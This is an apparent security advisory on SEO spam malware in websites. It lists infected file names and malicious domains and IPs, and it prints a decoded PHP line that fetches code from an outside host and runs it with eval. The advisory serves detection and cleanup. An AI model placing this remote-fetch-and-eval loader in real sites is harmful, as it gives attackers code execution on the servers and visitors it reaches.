How to fix SEO spam injections

Last updated: July 30 2021

Recently we noticed several SEO spam injections on the same pattern, starting with a list of encoded malicious files.
If you notice any of these inside your root folder, it means your site is infected: auto_seo.php, accesson.php, wikindex.php, old-index.php, 3index.php. Moreover, any addon sites, hosted on the same account, will be affected by cross-site contamination.

To perform a cleanup, you may follow the steps described here:
https://guides.magefix.com/2021/06/clean-driverfortnigtly-malware/

Try our Free site check.

After having a closer look, I managed to decode the following strings.

wikindex.php, 3index.php
$ch = curl_init(‘http://banksstop.tech/’.$_GET[‘f’]);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$result = curl_exec($ch);eval(‘?>’.$result);

auto_seo.php
http://28ioh.sgate.xyz/

index.php files are being injected with malware, also hidden .ico files are randomly installed.
Example: /wp-includes/blocks/column/.81a49ecc.ico

Malicious domains: 28ioh.sgate.xyz, banksstop.tech, hollywoodregistration.xyz.
Malicious IPs: 204.12.207.186, 69.197.184.130 ( WholeSale Internet, Inc. ).